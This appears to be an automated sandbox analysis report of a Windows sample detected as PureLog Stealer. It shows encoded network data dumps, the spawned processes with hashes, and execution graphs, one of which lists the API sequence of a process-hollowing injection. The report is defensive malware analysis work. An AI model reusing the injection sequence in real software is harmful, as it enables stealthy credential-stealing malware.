                            Data Ascii: KpoI9UuPNt6YqcFnCMY+Bdb6IYxi1PGyaDDIcPYaNko+M/SU8zYu+qz5/W+w9ieEPmYhgZ7UtRtkEMWQbg5KQsajaNg/duLb1FH1ZjX/tg2W090cN7g9ZhW0Gfmylkpnaqdg5H7ippYoLQi7CD5evUIyIYjLuB0TcRy0mGqPpraKrhhge1tKS7ycLFcAjnvtAo4ZlD+4LY60NORcp4Le6jK3/BBv8rYqBCU0czTeR+W6vgAV1yQtg0g0oPWrotM
                            2025-01-15 17:11:17 UTC1369INData Raw: 4f 42 37 38 72 4a 62 30 49 48 64 59 31 53 6d 4a 34 52 44 67 71 42 67 30 79 52 46 45 70 33 74 76 42 51 79 57 71 34 32 31 31 66 46 4f 46 4c 71 46 70 59 4d 6d 58 46 33 42 4c 72 61 50 52 59 32 6c 66 47 37 6d 47 55 50 64 58 6a 77 68 47 6f 4c 6e 73 36 69 58 39 54 31 53 76 36 79 5a 6d 41 73 49 46 65 77 76 35 62 78 75 6b 5a 35 4e 43 64 45 75 53 4b 46 62 45 6a 6b 65 6e 61 6a 47 70 4e 48 37 4e 79 72 35 31 70 54 32 4c 33 77 75 34 67 53 58 6e 32 61 55 71 6b 63 39 78 41 70 43 6e 58 39 73 50 77 79 49 6c 6f 4f 2b 6f 38 77 7a 44 38 36 63 70 59 34 69 63 79 6d 54 46 4f 65 67 56 2b 47 39 52 43 32 79 4a 33 75 41 44 67 67 62 4e 6f 6d 56 67 73 4b 62 2b 51 63 62 77 4c 47 41 70 79 52 7a 48 4f 45 56 68 50 68 4c 70 36 35 6c 4d 73 34 36 48 49 64 79 50 79 73 31 69 34 37 43 68 37 50
                            Data Ascii: OB78rJb0IHdY1SmJ4RDgqBg0yRFEp3tvBQyWq4211fFOFLqFpYMmXF3BLraPRY2lfG7mGUPdXjwhGoLns6iX9T1Sv6yZmAsIFewv5bxukZ5NCdEuSKFbEjkenajGpNH7Nyr51pT2L3wu4gSXn2aUqkc9xApCnX9sPwyIloO+o8wzD86cpY4icymTFOegV+G9RC2yJ3uADggbNomVgsKb+QcbwLGApyRzHOEVhPhLp65lMs46HIdyPys1i47Ch7P
                            2025-01-15 17:11:17 UTC1369INData Raw: 73 37 33 75 53 74 70 44 39 46 32 67 71 4e 4f 70 70 74 38 4b 4f 30 4d 66 59 68 6b 44 44 49 4b 6d 62 4f 51 73 5a 75 47 49 77 72 46 7a 36 43 7a 43 6d 73 59 2f 43 79 2b 71 30 32 46 6e 6b 55 4c 73 42 4a 53 6a 30 73 51 43 57 2b 31 70 37 36 6e 6f 4f 77 73 44 4f 53 53 2b 4f 73 2f 64 44 7a 41 4d 59 57 50 45 37 53 6f 58 52 4f 75 47 78 36 54 57 6d 78 36 4f 6f 57 56 6b 36 43 51 77 7a 63 50 7a 62 71 70 6a 68 31 52 42 38 77 2f 6f 6f 4a 55 6f 71 34 63 4b 73 34 64 54 36 6f 4a 46 54 73 58 75 6f 57 41 33 71 44 62 4e 42 6d 68 6d 49 43 36 42 6b 38 2b 78 78 37 6b 75 46 4f 52 73 55 51 7a 79 7a 6c 76 32 6e 4e 72 4d 7a 61 41 37 72 79 78 70 6f 49 44 42 2f 4b 4b 67 66 59 6a 44 69 71 66 43 65 62 34 51 62 4c 72 61 44 6a 64 46 48 6a 64 55 58 45 66 46 59 43 30 6f 35 75 6f 6d 41 59 54
                            Data Ascii: s73uStpD9F2gqNOppt8KO0MfYhkDDIKmbOQsZuGIwrFz6CzCmsY/Cy+q02FnkULsBJSj0sQCW+1p76noOwsDOSS+Os/dDzAMYWPE7SoXROuGx6TWmx6OoWVk6CQwzcPzbqpjh1RB8w/ooJUoq4cKs4dT6oJFTsXuoWA3qDbNBmhmIC6Bk8+xx7kuFORsUQzyzlv2nNrMzaA7ryxpoIDB/KKgfYjDiqfCeb4QbLraDjdFHjdUXEfFYC0o5uomAYT
                            2025-01-15 17:11:17 UTC1369INData Raw: 38 2f 65 6a 37 30 4a 4f 50 33 63 4a 32 46 61 78 44 2f 44 78 4f 35 61 6a 77 4c 45 71 4b 39 78 59 65 55 35 51 67 52 37 38 6d 37 72 54 64 4e 48 65 4e 7a 35 59 68 70 68 5a 4e 70 50 4f 38 78 62 70 34 50 59 7a 31 74 74 37 7a 46 70 59 33 41 55 44 72 6e 70 4b 43 34 4f 46 6b 66 31 33 65 55 6d 32 36 6b 37 56 49 49 72 69 35 6c 75 31 73 73 41 54 6d 2b 6b 36 4f 44 72 38 55 6c 4a 4f 79 31 39 36 6f 62 66 53 66 6c 4c 2b 4f 63 48 4b 43 32 48 7a 79 32 43 57 32 6b 44 6a 56 6c 4e 37 2f 70 78 74 79 67 36 31 52 57 73 73 53 2f 70 7a 70 30 43 2b 34 73 6d 36 59 58 68 65 35 6b 44 39 41 4c 48 62 46 78 44 52 77 78 6e 35 69 7a 72 35 50 76 42 52 4f 7a 74 71 61 4f 43 58 41 57 77 79 4b 4d 69 6d 6d 46 6b 32 6b 2f 73 79 31 36 6a 42 59 58 49 47 44 6f 71 4c 69 51 71 73 6b 71 53 4f 36 75 71
                            Data Ascii: 8/ej70JOP3cJ2FaxD/DxO5ajwLEqK9xYeU5QgR78m7rTdNHeNz5YhphZNpPO8xbp4PYz1tt7zFpY3AUDrnpKC4OFkf13eUm26k7VIIri5lu1ssATm+k6ODr8UlJOy196obfSflL+OcHKC2Hzy2CW2kDjVlN7/pxtyg61RWssS/pzp0C+4sm6YXhe5kD9ALHbFxDRwxn5izr5PvBROztqaOCXAWwyKMimmFk2k/sy16jBYXIGDoqLiQqskqSO6uq
                            2025-01-15 17:11:17 UTC1369INData Raw: 4b 7a 6e 62 67 2b 56 32 50 72 31 31 71 30 68 52 5a 6e 58 6b 30 48 42 57 2f 37 4b 53 63 6f 73 38 58 53 76 69 48 6c 71 77 63 56 53 6d 51 44 2b 4b 58 45 35 79 32 51 53 61 38 64 47 4b 7a 55 79 77 62 4e 5a 43 73 76 62 43 4c 31 46 6b 79 36 59 71 33 70 69 70 77 57 63 49 79 69 65 46 52 6f 35 31 4e 43 4d 41 38 66 6f 52 59 46 44 73 72 75 4a 43 6a 6f 63 6d 5a 4a 68 6a 76 78 49 6d 79 4a 55 38 6f 6b 52 65 6e 75 52 47 76 6d 47 42 6e 74 53 31 47 32 51 77 49 59 67 79 4c 36 74 79 78 7a 50 52 53 44 39 32 34 74 6f 51 2b 55 31 36 54 43 76 36 65 55 36 54 76 57 51 37 69 4d 55 43 67 42 51 68 67 61 71 61 2b 70 5a 43 6f 78 7a 49 4d 73 35 69 4c 70 67 51 44 57 38 68 73 6f 50 31 68 76 49 35 48 50 4f 38 63 65 74 77 4a 42 6e 35 7a 35 5a 47 34 75 34 76 39 4f 55 75 79 73 71 32 33 4e 31
                            Data Ascii: Kznbg+V2Pr11q0hRZnXk0HBW/7KScos8XSviHlqwcVSmQD+KXE5y2QSa8dGKzUywbNZCsvbCL1Fky6Yq3pipwWcIyieFRo51NCMA8foRYFDsruJCjocmZJhjvxImyJU8okRenuRGvmGBntS1G2QwIYgyL6tyxzPRSD924toQ+U16TCv6eU6TvWQ7iMUCgBQhgaqa+pZCoxzIMs5iLpgQDW8hsoP1hvI5HPO8cetwJBn5z5ZG4u4v9OUuysq23N1
                            2025-01-15 17:11:17 UTC1369INData Raw: 72 61 70 34 2b 71 39 42 4f 73 45 2b 63 34 6f 4f 59 78 6f 4f 34 2b 36 35 6e 72 54 33 4e 41 76 67 69 72 65 68 45 68 51 48 34 48 43 46 72 55 2b 51 6c 32 34 38 39 67 6c 37 67 57 39 71 42 78 4f 6c 6c 61 53 45 6a 75 34 56 4a 4e 36 37 6f 61 77 57 58 53 2f 75 4d 4a 71 47 59 70 36 47 59 51 2b 33 4d 33 7a 54 64 53 31 6d 49 59 47 37 76 49 69 71 79 7a 6b 5a 77 37 65 57 67 67 74 38 50 75 30 32 67 4c 74 58 76 61 56 38 4f 75 73 30 54 61 39 38 48 53 63 79 35 61 57 32 72 4a 58 58 46 68 6a 6d 75 59 54 35 66 6b 6b 35 35 77 47 6e 6a 32 4f 43 6d 55 78 76 79 7a 35 4d 73 55 67 57 41 68 36 44 74 70 2b 74 75 4d 35 59 42 4d 65 54 6a 34 77 4e 62 43 66 56 4d 5a 47 67 61 5a 69 79 47 51 33 77 42 30 6a 61 56 44 59 66 45 4b 57 5a 70 4b 32 73 35 67 67 57 78 72 53 6c 6d 52 74 36 46 74 4d
                            Data Ascii: rap4+q9BOsE+c4oOYxoO4+65nrT3NAvgirehEhQH4HCFrU+Ql2489gl7gW9qBxOllaSEju4VJN67oawWXS/uMJqGYp6GYQ+3M3zTdS1mIYG7vIiqyzkZw7eWggt8Pu02gLtXvaV8Ous0Ta98HScy5aW2rJXXFhjmuYT5fkk55wGnj2OCmUxvyz5MsUgWAh6Dtp+tuM5YBMeTj4wNbCfVMZGgaZiyGQ3wB0jaVDYfEKWZpK2s5ggWxrSlmRt6FtM
                            2025-01-15 17:11:17 UTC1369INData Raw: 61 66 75 48 6a 6d 77 4f 55 4b 6c 61 41 49 45 59 49 61 78 6d 71 2b 44 6d 41 51 2f 76 34 6e 32 2b 51 56 36 43 4e 38 71 6e 66 35 30 67 4c 4a 67 42 72 45 31 5a 34 5a 48 43 53 51 41 73 36 75 6a 68 63 50 6f 55 54 50 75 73 5a 79 69 4c 57 49 35 34 69 76 73 6c 6b 6d 52 70 6c 42 6d 78 7a 4a 62 73 51 51 4c 5a 54 32 79 70 61 65 44 74 39 51 37 44 63 48 4e 71 72 59 37 64 44 54 52 45 34 54 2f 46 61 57 61 57 53 62 74 48 6b 2b 7a 44 6a 38 49 42 50 36 50 6b 36 69 79 39 52 45 58 38 72 6e 39 39 54 64 77 52 2b 38 68 6e 36 41 55 70 4a 73 59 61 63 68 71 53 49 4e 7a 43 41 6b 4c 67 49 6a 47 76 72 7a 70 56 42 7a 6d 79 4b 4b 7a 64 77 73 74 78 51 69 34 67 58 47 46 72 30 51 59 74 41 39 59 69 48 70 71 41 69 47 46 69 37 4b 4d 74 64 73 45 47 4e 32 35 76 34 55 61 43 79 4b 57 45 70 65 6b
                            Data Ascii: afuHjmwOUKlaAIEYIaxmq+DmAQ/v4n2+QV6CN8qnf50gLJgBrE1Z4ZHCSQAs6ujhcPoUTPusZyiLWI54ivslkmRplBmxzJbsQQLZT2ypaeDt9Q7DcHNqrY7dDTRE4T/FaWaWSbtHk+zDj8IBP6Pk6iy9REX8rn99TdwR+8hn6AUpJsYachqSINzCAkLgIjGvrzpVBzmyKKzdwstxQi4gXGFr0QYtA9YiHpqAiGFi7KMtdsEGN25v4UaCyKWEpek


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:12:11:03
                            Start date:15/01/2025
                            Path:C:\Users\user\Desktop\EZsrFTi.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\EZsrFTi.exe"
                            Imagebase:0x620000
                            File size:376'320 bytes
                            MD5 hash:C0A15C8328D0EB6C48C194CA52787560
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:12:11:04
                            Start date:15/01/2025
                            Path:C:\Users\user\Desktop\EZsrFTi.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\EZsrFTi.exe"
                            Imagebase:0xa0000
                            File size:376'320 bytes
                            MD5 hash:C0A15C8328D0EB6C48C194CA52787560
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:12:11:04
                            Start date:15/01/2025
                            Path:C:\Users\user\Desktop\EZsrFTi.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\EZsrFTi.exe"
                            Imagebase:0x110000
                            File size:376'320 bytes
                            MD5 hash:C0A15C8328D0EB6C48C194CA52787560
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:4
                            Start time:12:11:04
                            Start date:15/01/2025
                            Path:C:\Users\user\Desktop\EZsrFTi.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\EZsrFTi.exe"
                            Imagebase:0xe50000
                            File size:376'320 bytes
                            MD5 hash:C0A15C8328D0EB6C48C194CA52787560
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:7
                            Start time:12:11:04
                            Start date:15/01/2025
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940
                            Imagebase:0x10000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:52.9%
                              Total number of Nodes:17
                              Total number of Limit Nodes:1
                              execution_graph 3225 ca1308 3227 ca1329 3225->3227 3226 ca15fb 3227->3226 3229 ca7080 3227->3229 3230 ca70b9 3229->3230 3231 ca7103 3230->3231 3232 ca73e3 VirtualProtect 3230->3232 3231->3226 3233 ca7420 3232->3233 3233->3226 3234 29e82a2 3235 29e82bc CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 3234->3235 3236 29e8363 WriteProcessMemory 3235->3236 3237 29e826b 3235->3237 3238 29e83a8 3236->3238 3239 29e8353 TerminateProcess 3237->3239 3242 29e82aa GetPEB 3237->3242 3240 29e83ad WriteProcessMemory 3238->3240 3241 29e83ea WriteProcessMemory Wow64SetThreadContext ResumeThread 3238->3241 3239->3237 3240->3238 3242->3235

                              Control-flow Graph

                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E8097,029E8087), ref: 029E82BD
                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 029E82D0
                              • Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 029E82EE
                              • ReadProcessMemory.KERNELBASE(00000380,?,029E80DB,00000004,00000000), ref: 029E8312
                              • VirtualAllocEx.KERNELBASE(00000380,?,?,00003000,00000040), ref: 029E833D
                              • TerminateProcess.KERNELBASE(00000380,00000000), ref: 029E835C
                              • WriteProcessMemory.KERNELBASE(00000380,00000000,?,?,00000000,?), ref: 029E8395
                              • WriteProcessMemory.KERNELBASE(00000380,00400000,?,?,00000000,?,00000028), ref: 029E83E0
                              • WriteProcessMemory.KERNELBASE(00000380,?,?,00000004,00000000), ref: 029E841E
                              • Wow64SetThreadContext.KERNEL32(00000394,04EB0000), ref: 029E845A
                              • ResumeThread.KERNELBASE(00000394), ref: 029E8469
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1489343504.00000000029E7000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E7000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_29e7000_EZsrFTi.jbxd
                              Similarity
                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                              • String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                              • API String ID: 2440066154-232383841
                              • Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                              • Instruction ID: dd8f9a53af97e6ed1d4e6c353387d80ca8eb340dc5a45303052d162c8da5a09e
                              • Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                              • Instruction Fuzzy Hash: 55B1187260064AAFDB60CFA8CC80BDA73A5FF88714F158524EA0DAB351D770FA41CB94

                              Control-flow Graph

                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E8097,029E8087), ref: 029E82BD
                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 029E82D0
                              • Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 029E82EE
                              • ReadProcessMemory.KERNELBASE(00000380,?,029E80DB,00000004,00000000), ref: 029E8312
                              • VirtualAllocEx.KERNELBASE(00000380,?,?,00003000,00000040), ref: 029E833D
                              • TerminateProcess.KERNELBASE(00000380,00000000), ref: 029E835C
                              • WriteProcessMemory.KERNELBASE(00000380,00000000,?,?,00000000,?), ref: 029E8395
                              • WriteProcessMemory.KERNELBASE(00000380,00400000,?,?,00000000,?,00000028), ref: 029E83E0
                              • WriteProcessMemory.KERNELBASE(00000380,?,?,00000004,00000000), ref: 029E841E
                              • Wow64SetThreadContext.KERNEL32(00000394,04EB0000), ref: 029E845A
                              • ResumeThread.KERNELBASE(00000394), ref: 029E8469
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1489343504.00000000029E7000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E7000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_29e7000_EZsrFTi.jbxd
                              Similarity
                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                              • String ID: TerminateProcess
                              • API String ID: 2440066154-2873147277
                              • Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                              • Instruction ID: 86a30ac89b934eb28bf965007bc93151cb91ae57d63b0d68dda5ef07369ec34a
                              • Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                              • Instruction Fuzzy Hash: 1E312F72244646ABDB35CF94CC91FEA7365BFC8B15F148508EB09AF380C6B4BA018B94

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 34 ca7138-ca715c 35 ca7168-ca718d 34->35 36 ca715e-ca7165 34->36 39 ca7190-ca71a3 35->39 41 ca71a9-ca71b4 39->41 42 ca737e-ca741e VirtualProtect 39->42 41->42 43 ca71ba-ca71c5 41->43 50 ca7420 42->50 51 ca7425-ca7439 42->51 43->42 44 ca71cb-ca71d9 43->44 44->39 46 ca71db-ca71e3 44->46 47 ca71e6-ca71f2 46->47 47->42 49 ca71f8-ca7202 47->49 49->42 52 ca7208-ca7214 49->52 50->51 53 ca721d-ca7226 52->53 54 ca7216-ca721c 52->54 53->42 55 ca722c-ca7237 53->55 54->53 55->42 56 ca723d-ca724c 55->56 56->42 57 ca7252-ca7260 56->57 57->47 58 ca7262-ca7271 57->58 59 ca7277-ca72af call ca3f40 58->59 60 ca7374-ca737b 58->60 64 ca72b1-ca72bd 59->64 65 ca72f5-ca730b 59->65 66 ca72bf-ca72c5 64->66 67 ca72c6-ca72cf 64->67 73 ca7310-ca7319 65->73 66->67 67->65 68 ca72d1-ca72dc 67->68 68->65 70 ca72de-ca72ed 68->70 70->65 71 ca72ef-ca72f3 70->71 71->73 73->42 74 ca731b-ca7329 73->74 74->42 76 ca732b-ca7338 74->76 77 ca733a-ca7341 76->77 78 ca7342-ca734b 76->78 77->78 78->42 79 ca734d-ca735a 78->79 79->42 80 ca735c-ca736e 79->80 80->59 80->60
                              Memory Dump Source
                              • Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e97e8ee4c7bfd04023cff9ea36a91dac3aa7c5d118da285066dcf973bc14fcf
                              • Instruction ID: 40f504c9eaf2940a4ca96d2849b700f36925200cb7f1cd38d6d84da49db51bf0
                              • Opcode Fuzzy Hash: 1e97e8ee4c7bfd04023cff9ea36a91dac3aa7c5d118da285066dcf973bc14fcf
                              • Instruction Fuzzy Hash: 28A15D70D042599FCB04CFA9D880AEDFFF1BF4A314F29C669E458A7255C334A881CBA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'lq$4'lq
                              • API String ID: 0-1917830556
                              • Opcode ID: 8dc81a809396817880ba37a532e05eb0456a42f6406cc8041c8639517ad3f6f2
                              • Instruction ID: ff8bb7eac0834cd09228aa5f466847950038d46817783babfe31621f8bba10f0
                              • Opcode Fuzzy Hash: 8dc81a809396817880ba37a532e05eb0456a42f6406cc8041c8639517ad3f6f2
                              • Instruction Fuzzy Hash: 3E613A74A042458FDB0AEF7AE98179EBBA3BBC9300F14C179D0189F269EF7559058B50
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'lq$4'lq
                              • API String ID: 0-1917830556
                              • Opcode ID: 7b4cc61a599bb4d35b69fada99159036e105cf3f24265e8073e32e8bba44d3ae
                              • Instruction ID: 8b45597e244da5ff0c5aec7d775d042a59c684c4700f488a8be3ea0ee858c832
                              • Opcode Fuzzy Hash: 7b4cc61a599bb4d35b69fada99159036e105cf3f24265e8073e32e8bba44d3ae
                              • Instruction Fuzzy Hash: 0C513574A042458FDB09EF7AE98179EBBE3BBC9300F24C139D0189F269EF3459099B50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1488256835.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ca0000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f43c1afffd4eaf18824eb2b1aaf7c3553a121ace1fea92b41a76a97569b11af
                              • Instruction ID: 2544f517e5e5a1ab34fc3e41378bb4ce5b9b4a5d1927cc61d2cc279d1fbed412
                              • Opcode Fuzzy Hash: 4f43c1afffd4eaf18824eb2b1aaf7c3553a121ace1fea92b41a76a97569b11af
                              • Instruction Fuzzy Hash: EAC17E71E0412A8FCB05CBA8C9856AEFBF2FF49304F288269D455EB245D734ED46CB90

                              Execution Graph

                              Execution Coverage:8.7%
                              Dynamic/Decrypted Code Coverage:4.3%
                              Signature Coverage:42%
                              Total number of Nodes:374
                              Total number of Limit Nodes:23
                              execution_graph 13830 43fc02 GetForegroundWindow 13834 4410f0 13830->13834 13832 43fc12 GetForegroundWindow 13833 43fc25 13832->13833 13835 441106 13834->13835 13835->13832 13836 40e301 CoInitializeEx CoInitializeEx 13837 43f382 13839 43f3c0 13837->13839 13838 43fa8e 13839->13838 13841 43f050 LdrInitializeThunk 13839->13841 13841->13838 13445 4313cf 13448 414810 13445->13448 13447 4313d4 CoSetProxyBlanket 13448->13447 13851 43898f 13855 440ba0 13851->13855 13853 4389a7 GetUserDefaultUILanguage 13854 4389d3 13853->13854 13856 440bc0 13855->13856 13856->13853 13856->13856 13449 43facd 13450 43faeb 13449->13450 13451 43fb0e 13449->13451 13450->13451 13453 43f050 LdrInitializeThunk 13450->13453 13453->13451 13454 435bd0 13455 435bfe GetSystemMetrics GetSystemMetrics 13454->13455 13456 435c3b DeleteObject 13455->13456 13458 435c88 SelectObject 13456->13458 13460 435d00 SelectObject 13458->13460 13461 435d1d DeleteObject 13460->13461 13463 40e054 13464 40e060 13463->13464 13467 40e074 13463->13467 13464->13467 13536 43f050 LdrInitializeThunk 13464->13536 13465 40e0be 13483 4243a0 13465->13483 13467->13465 13537 43f050 LdrInitializeThunk 13467->13537 13470 40e0f6 13496 4249d0 13470->13496 13472 40e112 13504 424ca0 13472->13504 13474 40e12e 13510 427520 13474->13510 13478 40e15c 13532 429250 13478->13532 13480 40e181 13481 435a30 6 API calls 13480->13481 13482 40e1a6 13481->13482 13484 424400 13483->13484 13484->13484 13485 42442f RtlExpandEnvironmentStrings 13484->13485 13487 424470 13485->13487 13486 42479f 13542 4208a0 13486->13542 13487->13486 13489 4244ad RtlExpandEnvironmentStrings 13487->13489 13490 4244cc 13487->13490 13491 4244ff 13487->13491 13493 4245e4 13487->13493 13489->13486 13489->13490 13489->13491 13489->13493 13490->13470 13491->13491 13538 442320 13491->13538 13493->13493 13494 442320 LdrInitializeThunk 13493->13494 13494->13490 13495 4245d1 13495->13486 13495->13490 13495->13493 13497 424a60 13496->13497 13497->13497 13498 424aad RtlExpandEnvironmentStrings 13497->13498 13499 424b00 13498->13499 13499->13499 13500 424c47 13499->13500 13501 424b7b 13499->13501 13503 424b5c RtlExpandEnvironmentStrings 13499->13503 13500->13472 13575 41e9c0 13501->13575 13503->13500 13503->13501 13505 424cae 13504->13505 13579 441230 13505->13579 13507 424d96 13508 424dd1 13507->13508 13583 4416d0 13507->13583 13508->13474 13511 427550 13510->13511 13512 4275be 13511->13512 13596 43f050 LdrInitializeThunk 13511->13596 13513 40e153 13512->13513 13515 43d460 RtlAllocateHeap 13512->13515 13520 427a10 13513->13520 13517 4276d9 13515->13517 13516 43d480 RtlFreeHeap 13516->13513 13519 42772e 13517->13519 13597 43f050 LdrInitializeThunk 13517->13597 13519->13516 13598 427a30 13520->13598 13522 427a19 13522->13478 13619 43b300 13522->13619 13524 4421d0 LdrInitializeThunk 13530 4284ca 13524->13530 13527 4286e6 13531 4283c6 13527->13531 13636 43f050 LdrInitializeThunk 13527->13636 13529 428387 13529->13524 13529->13527 13529->13529 13529->13530 13529->13531 13530->13527 13530->13531 13626 442470 13530->13626 13630 442500 13530->13630 13531->13478 13533 429290 13532->13533 13533->13533 13534 4292c4 RtlExpandEnvironmentStrings 13533->13534 13535 429320 13534->13535 13535->13535 13536->13467 13537->13465 13539 442340 13538->13539 13541 44241e 13539->13541 13557 43f050 LdrInitializeThunk 13539->13557 13541->13495 13558 4421d0 13542->13558 13544 420ec3 13544->13490 13545 4208e0 13545->13544 13562 43d460 13545->13562 13547 42091e 13555 420935 13547->13555 13565 43f050 LdrInitializeThunk 13547->13565 13548 420ea5 13550 43d480 RtlFreeHeap 13548->13550 13552 420eb5 13550->13552 13551 43d460 RtlAllocateHeap 13551->13555 13552->13544 13571 43f050 LdrInitializeThunk 13552->13571 13555->13548 13555->13551 13566 43f050 LdrInitializeThunk 13555->13566 13567 43d480 13555->13567 13557->13541 13560 4421f0 13558->13560 13559 4422ce 13559->13545 13560->13559 13572 43f050 LdrInitializeThunk 13560->13572 13573 4407a0 13562->13573 13564 43d46a RtlAllocateHeap 13564->13547 13565->13547 13566->13555 13568 43d493 13567->13568 13569 43d495 13567->13569 13568->13555 13570 43d49a RtlFreeHeap 13569->13570 13570->13555 13571->13552 13572->13559 13574 4407b0 13573->13574 13574->13564 13574->13574 13576 41ea00 13575->13576 13576->13576 13577 4208a0 3 API calls 13576->13577 13578 41ea55 13577->13578 13578->13500 13580 441250 13579->13580 13582 4412df 13580->13582 13593 43f050 LdrInitializeThunk 13580->13593 13582->13507 13584 4416e5 13583->13584 13586 4416fe 13583->13586 13584->13586 13594 43f050 LdrInitializeThunk 13584->13594 13585 441951 13585->13507 13586->13585 13588 43d460 RtlAllocateHeap 13586->13588 13590 441769 13588->13590 13589 43d480 RtlFreeHeap 13589->13585 13592 44179f 13590->13592 13595 43f050 LdrInitializeThunk 13590->13595 13592->13589 13593->13582 13594->13586 13595->13592 13596->13512 13597->13519 13599 427a90 13598->13599 13599->13599 13637 43d4b0 13599->13637 13604 427b2b 13607 427c22 13604->13607 13609 427bd0 13604->13609 13651 43da40 13604->13651 13607->13607 13663 43d7d0 13607->13663 13608 42813e 13608->13522 13608->13608 13610 43b300 3 API calls 13608->13610 13609->13607 13609->13608 13611 428387 13609->13611 13615 427ccb 13609->13615 13659 43d9d0 13609->13659 13610->13611 13612 4421d0 LdrInitializeThunk 13611->13612 13614 4284ca 13611->13614 13611->13615 13617 4286e6 13611->13617 13612->13614 13613 442470 LdrInitializeThunk 13613->13614 13614->13613 13614->13615 13616 442500 LdrInitializeThunk 13614->13616 13614->13617 13615->13522 13616->13614 13617->13615 13667 43f050 LdrInitializeThunk 13617->13667 13625 43b330 13619->13625 13620 441230 LdrInitializeThunk 13620->13625 13621 4416d0 3 API calls 13621->13625 13622 43b487 13622->13529 13625->13620 13625->13621 13625->13622 13675 441cd0 13625->13675 13685 43f050 LdrInitializeThunk 13625->13685 13627 4424ae 13626->13627 13628 44248e 13626->13628 13627->13530 13628->13627 13688 43f050 LdrInitializeThunk 13628->13688 13631 44253f 13630->13631 13632 442519 13630->13632 13631->13530 13632->13631 13689 43f050 LdrInitializeThunk 13632->13689 13634 442568 13634->13631 13690 43f050 LdrInitializeThunk 13634->13690 13636->13531 13638 43d4ee 13637->13638 13640 43d4ce 13637->13640 13639 